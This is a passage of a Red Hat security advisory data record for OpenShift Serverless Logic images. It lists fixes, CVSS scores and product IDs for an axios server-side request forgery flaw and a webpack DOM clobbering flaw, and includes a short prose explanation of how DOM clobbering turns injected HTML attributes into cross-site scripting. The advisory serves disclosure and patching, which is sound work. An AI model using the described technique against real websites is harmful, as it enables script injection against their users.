"https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", }, ], release_date: "2024-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "axios: axios: Server-Side Request Forgery", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", 